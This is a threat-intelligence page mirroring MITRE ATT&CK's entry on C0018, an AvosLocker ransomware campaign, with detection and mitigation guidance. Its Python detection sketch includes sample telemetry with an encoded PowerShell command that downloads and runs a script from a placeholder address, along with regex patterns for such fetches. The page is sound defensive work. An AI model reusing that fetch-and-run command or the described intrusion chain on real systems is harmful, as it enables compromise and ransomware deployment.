C0018: C0018
C0018 was a month-long ransomware intrusion that successfully deployed AvosLocker onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing AvosLocker.[1][2]
Analyst context for executives and security teams
C0018 matters because it shows a ransomware intrusion pattern that moved from an exposed server to internal discovery, credential access tooling, remote access/C2 frameworks, lateral movement, and eventual AvosLocker deployment. For leaders, the decision value is not the campaign name itself; it is whether exposed services, administrative tooling, remote desktop paths, credential controls, and ransomware impact readiness are governed and evidenced well enough to stop or contain a similar month-long intrusion before encryption.
Executive priority
Prioritize this as a ransomware resilience and exposed-attack-surface validation case. Executives should ask whether public-facing systems are continuously inventoried and remediated, whether privileged credential exposure is monitored, whether RDP/WMI/software deployment tools are controlled, and whether incident response can prove lateral movement and tool staging activity quickly. Because ATT&CK provides no official detection text for this campaign, coverage should be demonstrated through local telemetry, control testing, and incident playbooks rather than assumed from ATT&CK alone.
Technical view
SOC, detection engineering, and IR teams should validate coverage across the relationship chain supplied by ATT&CK: initial access via Exploit Public-Facing Application; discovery such as network configuration, user, and service discovery; execution through PowerShell, WMI, rundll32, and software deployment tools; C2 and tooling involving Cobalt Strike, Sliver, web protocols, non-standard ports, remote desktop software, and file transfer; credential risk through Mimikatz; lateral activity via RDP and lateral tool transfer; and impact through data encryption. Focus on correlations that connect exposed-server compromise to internal administration abuse and ransomware staging, rather than on isolated tool-name alerts.
Likely telemetry
- Internet-facing server inventory, vulnerability, and application logs for exposed services
- Endpoint process creation and command-line telemetry, including PowerShell, WMI, rundll32, netsh, ping, and renamed or masqueraded binaries
- Authentication and session logs for RDP and other remote access activity
- Windows security, PowerShell, and WMI operational logs where applicable
- EDR detections and file events for tool transfer, staging directories, suspicious DLL execution, and ransomware-related file activity
Detection direction
- Build detection around behavior clusters: exposed-server access followed by discovery commands, tool ingress, credential dumping indicators, remote execution, lateral transfer, and encryption activity.
- Tune carefully for dual-use tools. Ping, netsh, PowerShell, WMI, rundll32, RDP, remote desktop software, and software deployment systems are common in administration; prioritize unusual parent-child process chains, rare hosts, new administrative paths, abnormal timing, and newly observed binaries.
- Validate visibility for Cobalt Strike and Sliver-like C2 using network behavior, process lineage, and file staging evidence, not only static signatures.
- Look for command obfuscation and masquerading by comparing command patterns, binary paths, names, hashes, signer information, and execution locations against enterprise baselines.
- Confirm that ransomware-impact detections include early indicators such as tool staging and lateral movement, not only final encryption events.
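As an added illustration (not code from the page's cited reports or from ATT&CK), the Python triage sketch below decodes PowerShell `-EncodedCommand` payloads, flags PowerShell spawned by `wmiprvse.exe`, flags RDP on non-standard ports such as those listed in the techniques table, and reports only hosts where more than one of these behaviours clusters. The telemetry, hostnames, IP addresses and URL are constructed placeholders.

```python
import base64
import re

# Constructed sample telemetry (placeholders, not from the cited reports).
def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

PROCESS_EVENTS = [
    {"host": "ws01", "parent": "wmiprvse.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s.ps1')")},
    {"host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -enc " + _enc("Get-Service | Out-File svc.txt")},
    {"host": "srv01", "parent": "services.exe", "image": "svchost.exe",
     "cmd": "svchost.exe -k termsvcs"},
]
NETWORK_EVENTS = [
    {"host": "ws01", "dst": "10.0.0.5", "dport": 28035, "app": "rdp"},
    {"host": "ws03", "dst": "10.0.0.6", "dport": 3389, "app": "rdp"},
]

ENC_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
REMOTE_FETCH = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b", re.IGNORECASE)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_process(ev: dict) -> list:
    """Map one process-creation event to the C0018-style behaviours it matches."""
    hits = []
    script = decode_encoded_command(ev["cmd"])
    if script and REMOTE_FETCH.search(script):
        hits.append("T1027.010/T1059.001 encoded PowerShell fetching remote content")
    if ev["parent"].lower() == "wmiprvse.exe" and ev["image"].lower() == "powershell.exe":
        hits.append("T1047 PowerShell spawned by WMI Provider Host")
    return hits

def triage_network(ev: dict) -> list:
    """Flag RDP off its standard port (C0018 used 28035, 32467, 41578, 46892)."""
    if ev["app"] == "rdp" and ev["dport"] != 3389:
        return [f"T1571/T1021.001 RDP to {ev['dst']}:{ev['dport']}"]
    return []

def hosts_with_clustered_findings(procs, flows, min_hits=2) -> dict:
    """Correlate per host; return only hosts with at least min_hits behaviours."""
    per_host = {}
    for ev in procs:
        per_host.setdefault(ev["host"], []).extend(triage_process(ev))
    for ev in flows:
        per_host.setdefault(ev["host"], []).extend(triage_network(ev))
    return {h: f for h, f in per_host.items() if len(f) >= min_hits}
```

Single-behaviour hits (the benign encoded script on ws02, standard-port RDP on ws03) stay below the cluster threshold, which is the tuning point the bullets above ask for.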
Mitigation priorities
- Reduce initial access risk by maintaining an accurate inventory of Internet-facing applications and remediating exposed server vulnerabilities or misconfigurations based on risk.
- Restrict and monitor administrative pathways such as RDP, WMI, software deployment tooling, and remote desktop software; require strong authentication and limit privileged access where applicable.
- Harden credential protections and monitor for credential dumping behavior associated with tools such as Mimikatz.
- Control script and command execution through least privilege, logging, and policy enforcement for PowerShell, rundll32, and administrative utilities.
- Segment critical systems and limit lateral file transfer paths to reduce ransomware propagation opportunities.
Analyst notes and limits
This object is a campaign entry, not a full procedure report. ATT&CK states the intrusion lasted about a month, began through an exposed server, used open-source tools, and deployed AvosLocker. The relationship set is valuable because it maps the defensive validation surface: public-facing exploitation, discovery, credential dumping, remote execution, C2, lateral movement, and data encryption. Local environment baselines are essential because many related tools and techniques overlap heavily with legitimate administration.
Official detection is not provided, the campaign platforms are not specified, and the actors are unidentified in the supplied description. Related software and technique platform fields indicate where those objects may apply, but they should not be treated as confirmed campaign platform scope without local evidence. This take does not assert active exploitation, attribution, customer exposure, or guaranteed detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1190 | Exploit Public-Facing Application | During C0018, the threat actors exploited VMware Horizon Unified Access Gateways that were vulnerable to several Log4Shell vulnerabilities, including CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832.[2] |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | |
| Enterprise | T1571 | Non-Standard Port | During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections.[1] |
| Enterprise | T1021.001 | Remote Desktop Protocol Sub-technique | During C0018, the threat actors opened a variety of ports to establish RDP connections, including ports 28035, 32467, 41578, and 46892.[1] |
| Enterprise | T1219.002 | Remote Desktop Software Sub-technique | During C0018, the threat actors used AnyDesk to transfer tools between systems.[2][1] |
| Enterprise | T1570 | Lateral Tool Transfer | During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy.[2][1] |
| Enterprise | T1033 | System Owner/User Discovery | During C0018, the threat actors collected `whoami` information via PowerShell scripts.[1] |
| Enterprise | T1486 | Data Encrypted for Impact | During C0018, the threat actors used AvosLocker ransomware to encrypt files on the compromised network.[2][1] |
| Enterprise | T1046 | Network Service Discovery | During C0018, the threat actors used the SoftPerfect Network Scanner for network scanning.[2] |
| Enterprise | T1059.001 | PowerShell Sub-technique | During C0018, the threat actors used encoded PowerShell scripts for execution.[2][1] |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | During C0018, the threat actors used Base64 to encode their PowerShell scripts.[2][1] |
| Enterprise | T1016 | System Network Configuration Discovery | During C0018, the threat actors ran `nslookup` and Advanced IP Scanner on the target network.[1] |
| Enterprise | T1588.002 | Tool Sub-technique | |
| Enterprise | T1071.001 | Web Protocols Sub-technique | During C0018, the threat actors used HTTP for C2 communications.[1] |
| Enterprise | T1072 | Software Deployment Tools | During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network.[2] |
| Enterprise | T1105 | Ingress Tool Transfer | During C0018, the threat actors downloaded additional tools, such as Mimikatz and Sliver, as well as Cobalt Strike and AvosLocker ransomware onto the victim network.[2][1] |
| Enterprise | T1036 | Masquerading | During C0018, AvosLocker was disguised using the victim company name as the filename.[2] |
| Enterprise | T1047 | Windows Management Instrumentation | During C0018, the threat actors used WMIC to modify administrative settings on both a local and a remote host, likely as part of the first stages for their lateral movement; they also used WMI Provider Host (`wmiprvse.exe`) to execute a variety of encoded PowerShell scripts using the `DownloadString` method.[2][1] |
| Enterprise | T1218.011 | Rundll32 Sub-technique | |
Groups, software, and campaigns
S0633: Sliver
S0108: netsh
S0097: Ping
S1053: AvosLocker
AvosLocker is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, AvosLocker had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.[1][2][3]
S0002: Mimikatz
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (object hashes and MITRE modification timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | b8aa3fa0dcc0… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Costa AvosLocker May 2022: Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.
[2] Cisco Talos Avos Jun 2022: Venere, G., Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. Retrieved January 11, 2023.
[3] mitre-attack C0018
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.